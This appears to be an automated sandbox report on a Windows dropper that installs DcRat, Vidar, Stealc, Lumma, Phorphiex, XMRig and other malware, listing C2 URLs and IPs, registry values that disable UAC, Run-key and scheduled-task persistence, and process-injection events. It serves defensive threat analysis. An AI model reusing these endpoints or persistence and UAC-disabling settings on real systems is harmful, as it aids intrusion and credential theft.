dcrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Resubmissions

26-11-2024 23:19

241126-3a6byavlhw 10

26-11-2024 23:11

26-11-2024 23:08

26-11-2024 23:06

26-11-2024 23:05

26-11-2024 23:04

26-11-2024 22:59

26-11-2024 22:53

Analysis

max time kernel
173s
max time network
286s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
26-11-2024 19:25

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

phorphiex

http://185.215.113.84

http://185.215.113.66

185.215.113.66

Extracted

Family

stealc

Botnet

LogsDiller

http://194.15.46.65

Attributes

url_path
/7f031eb0d257b290.php

Extracted

Family

vidar

Version

11.3

Botnet

a21440e9f7223be06be5f5e2f94969c7

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

lumma

https://associationokeo.shop/api

https://turkeyunlikelyofw.shop/api

https://detectordiscusser.shop/api

https://technologyenterdo.shop/api

https://fieldtrollyeowskwe.shop/api

Signatures

DcRat 16 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeagentServerFont.exeschtasks.exeschtasks.exe4363463463464363463463463.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3740	schtasks.exe
File created	C:\Windows\twain_32\9e8d7a4ca61bd9	agentServerFont.exe
3964	schtasks.exe
1436	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
2128	schtasks.exe
2576	schtasks.exe
1344	schtasks.exe
2352	schtasks.exe
428	schtasks.exe
1828	schtasks.exe
3456	schtasks.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\69ddcba757bf72	agentServerFont.exe
3948	schtasks.exe
1144	schtasks.exe
1616	schtasks.exe

Dcrat family
dcrat

Detect Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe	family_vidar_v7
behavioral1/memory/3932-833-0x00000000003D0000-0x00000000006D0000-memory.dmp	family_vidar_v7
behavioral1/memory/3932-1117-0x00000000003D0000-0x00000000006D0000-memory.dmp	family_vidar_v7

Detects ZharkBot payload 1 IoCs

ZharkBot is a botnet written C++.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe	zharkcore

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1616	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3740	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3456	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3948	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1344	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	428	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	3900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2352	3900	schtasks.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

2481835878.exewinupsecvmgr.exe

description	pid	process	target process
PID 220 created 3296	220	2481835878.exe	Explorer.EXE
PID 220 created 3296	220	2481835878.exe	Explorer.EXE
PID 1008 created 3296	1008	winupsecvmgr.exe	Explorer.EXE
PID 1008 created 3296	1008	winupsecvmgr.exe	Explorer.EXE
PID 1008 created 3296	1008	winupsecvmgr.exe	Explorer.EXE

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
ZharkBot
ZharkBot is a botnet written C++.
botnet zharkbot
Zharkbot family
zharkbot
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe	dcrat
C:\Hyperruntimeperf\agentServerFont.exe	dcrat
behavioral1/memory/2396-79-0x00000000001F0000-0x000000000030A000-memory.dmp	dcrat

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1008-290-0x00007FF7E96C0000-0x00007FF7E9C57000-memory.dmp	xmrig
behavioral1/memory/1172-294-0x00007FF7E9000000-0x00007FF7E97EF000-memory.dmp	xmrig
behavioral1/memory/1172-340-0x00007FF7E9000000-0x00007FF7E97EF000-memory.dmp	xmrig
behavioral1/memory/1172-436-0x00007FF7E9000000-0x00007FF7E97EF000-memory.dmp	xmrig

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5088 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2828 attrib.exe

pid	process
5088	netsh.exe

pid	process
2828	attrib.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/4756-1602-0x0000000004A20000-0x0000000004A86000-memory.dmp	net_reactor
behavioral1/memory/4756-1603-0x00000000050B0000-0x0000000005114000-memory.dmp	net_reactor

Executes dropped EXE 26 IoCs

Processes:

av_downloader.exeAV_DOW~1.EXEst.exetest18.exeDCRatBuild.exeServer.exeserver.exeagentServerFont.exeRegistry.exeexbuild.exeHkbsse.exetwztl.exesysnldcvmr.exeHkbsse.exe3226925155.exe1368212999.exe2481835878.exe315457734.exeGuide2018.exewinupsecvmgr.exe484530136.exe1648223512.execryyy.exeGREENpackage.exetdrp.exerandom.exe

pid	process
1884	av_downloader.exe
2520	AV_DOW~1.EXE
4148	st.exe
2344	test18.exe
848	DCRatBuild.exe
3836	Server.exe
4192	server.exe
2396	agentServerFont.exe
3504	Registry.exe
840	exbuild.exe
4044	Hkbsse.exe
4404	twztl.exe
4828	sysnldcvmr.exe
124	Hkbsse.exe
3748	3226925155.exe
3928	1368212999.exe
220	2481835878.exe
3204	315457734.exe
1484	Guide2018.exe
1008	winupsecvmgr.exe
5008	484530136.exe
2400	1648223512.exe
672	cryyy.exe
1108	GREENpackage.exe
3688	tdrp.exe
4112	random.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

server.exetwztl.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\42db17215651017a223d2108cb096394 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	twztl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4680 powershell.exe
2664 powershell.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

File opened (read-only) \??\e: cmd.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
4 pastebin.com
12 raw.githubusercontent.com
16 pastebin.com
99 raw.githubusercontent.com

pid	process
4680	powershell.exe
2664	powershell.exe

description	ioc	process
File opened (read-only)	\??\e:	cmd.exe

flow	ioc
4	raw.githubusercontent.com
4	pastebin.com
12	raw.githubusercontent.com
16	pastebin.com
99	raw.githubusercontent.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\random.exe	autoit_exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

winupsecvmgr.exe

description	pid	process	target process
PID 1008 set thread context of 3740	1008	winupsecvmgr.exe	conhost.exe
PID 1008 set thread context of 1172	1008	winupsecvmgr.exe	dwm.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5820-2081-0x0000000000400000-0x000000000041B000-memory.dmp	upx
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe	upx
behavioral1/memory/5820-2102-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/memory/5508-2103-0x0000000000400000-0x0000000000727000-memory.dmp	upx
behavioral1/memory/5508-2139-0x0000000000400000-0x0000000000727000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe	upx
behavioral1/memory/4500-2156-0x0000000000400000-0x000000000047D000-memory.dmp	upx
behavioral1/memory/4500-2163-0x0000000000400000-0x000000000047D000-memory.dmp	upx
behavioral1/memory/5508-2185-0x0000000000400000-0x0000000000727000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

agentServerFont.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\smss.exe	agentServerFont.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\69ddcba757bf72	agentServerFont.exe

Drops file in Windows directory 13 IoCs

Processes:

agentServerFont.exeUserOOBEBroker.exetwztl.exeUserOOBEBroker.exeexbuild.exe

description	ioc	process
File created	C:\Windows\twain_32\9e8d7a4ca61bd9	agentServerFont.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File created	C:\Windows\sysnldcvmr.exe	twztl.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	twztl.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File created	C:\Windows\twain_32\RuntimeBroker.exe	agentServerFont.exe
File created	C:\Windows\Tasks\Hkbsse.job	exbuild.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
defense_evasion privilege_escalation

Create Process with Token
T1134.002

Processes:

mshta.exe

pid process

4876 mshta.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4876	mshta.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2080 672 WerFault.exe cryyy.exe
6136 1108 WerFault.exe GREENpackage.exe
5260 3744 WerFault.exe q1wnx5ir.exe

pid	pid_target	process	target process
2080	672	WerFault.exe	cryyy.exe
6136	1108	WerFault.exe	GREENpackage.exe
5260	3744	WerFault.exe	q1wnx5ir.exe

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

twztl.exe1648223512.execryyy.exetdrp.exetaskkill.exeDCRatBuild.exeServer.exeserver.exe1368212999.exeFileCoAuth.exe315457734.exeAV_DOW~1.EXEreg.exeexbuild.exeGuide2018.exerandom.exeav_downloader.exeHkbsse.exesysnldcvmr.exenetsh.exeFileCoAuth.exe484530136.exeGREENpackage.exe4363463463464363463463463.exeWScript.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	twztl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1648223512.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cryyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tdrp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1368212999.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	315457734.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AV_DOW~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exbuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guide2018.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	av_downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	484530136.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GREENpackage.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Guide2018.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Guide2018.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Guide2018.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4764 timeout.exe
5372 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

5156 ipconfig.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 170 Go-http-client/1.1
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2108 taskkill.exe
432 taskkill.exe
4016 taskkill.exe
5216 taskkill.exe
5452 taskkill.exe
5460 taskkill.exe
5636 taskkill.exe

pid	process
4764	timeout.exe
5372	timeout.exe

pid	process
5156	ipconfig.exe

description	flow	ioc
HTTP User-Agent header	170	Go-http-client/1.1

pid	process
2108	taskkill.exe
432	taskkill.exe
4016	taskkill.exe
5216	taskkill.exe
5452	taskkill.exe
5460	taskkill.exe
5636	taskkill.exe

Modifies registry class 7 IoCs

Processes:

BackgroundTransferHost.exeMiniSearchHost.exeDCRatBuild.exeagentServerFont.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	DCRatBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	agentServerFont.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1784 reg.exe

pid	process
1784	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1436	schtasks.exe
3964	schtasks.exe
3948	schtasks.exe
1344	schtasks.exe
3740	schtasks.exe
3456	schtasks.exe
2128	schtasks.exe
428	schtasks.exe
1828	schtasks.exe
2576	schtasks.exe
1616	schtasks.exe
1144	schtasks.exe
2352	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

agentServerFont.exeRegistry.exeserver.exe

pid	process
2396	agentServerFont.exe
3504	Registry.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe
4192	server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

4192 server.exe

pid	process
4192	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exeagentServerFont.exeRegistry.exeserver.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3936	4363463463464363463463463.exe
Token: SeDebugPrivilege	2396	agentServerFont.exe
Token: SeDebugPrivilege	3504	Registry.exe
Token: SeDebugPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: 33	4192	server.exe
Token: SeIncBasePriorityPrivilege	4192	server.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe
Token: SeRemoteShutdownPrivilege	4680	powershell.exe
Token: SeUndockPrivilege	4680	powershell.exe
Token: SeManageVolumePrivilege	4680	powershell.exe
Token: 33	4680	powershell.exe
Token: 34	4680	powershell.exe
Token: 35	4680	powershell.exe
Token: 36	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

exbuild.exedwm.exe7zFM.exerandom.exe

pid	process
840	exbuild.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1004	7zFM.exe
4112	random.exe
4112	random.exe
1172	dwm.exe
4112	random.exe
4112	random.exe
1172	dwm.exe

Suspicious use of SendNotifyMessage 25 IoCs

Processes:

dwm.exerandom.exe

pid	process
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
1172	dwm.exe
4112	random.exe
4112	random.exe
1172	dwm.exe
4112	random.exe
4112	random.exe
1172	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MiniSearchHost.exe

pid process

1948 MiniSearchHost.exe

pid	process
1948	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exeav_downloader.execmd.exemshta.exeAV_DOW~1.EXEcmd.exeDCRatBuild.exeServer.exeWScript.execmd.exeagentServerFont.execmd.exeserver.exe

description	pid	process	target process
PID 3936 wrote to memory of 1884	3936	4363463463464363463463463.exe	av_downloader.exe
PID 3936 wrote to memory of 1884	3936	4363463463464363463463463.exe	av_downloader.exe
PID 3936 wrote to memory of 1884	3936	4363463463464363463463463.exe	av_downloader.exe
PID 1884 wrote to memory of 5000	1884	av_downloader.exe	cmd.exe
PID 1884 wrote to memory of 5000	1884	av_downloader.exe	cmd.exe
PID 5000 wrote to memory of 4876	5000	cmd.exe	mshta.exe
PID 5000 wrote to memory of 4876	5000	cmd.exe	mshta.exe
PID 4876 wrote to memory of 2520	4876	mshta.exe	AV_DOW~1.EXE
PID 4876 wrote to memory of 2520	4876	mshta.exe	AV_DOW~1.EXE
PID 4876 wrote to memory of 2520	4876	mshta.exe	AV_DOW~1.EXE
PID 2520 wrote to memory of 4404	2520	AV_DOW~1.EXE	cmd.exe
PID 2520 wrote to memory of 4404	2520	AV_DOW~1.EXE	cmd.exe
PID 4404 wrote to memory of 4836	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 4836	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 4780	4404	cmd.exe	reg.exe
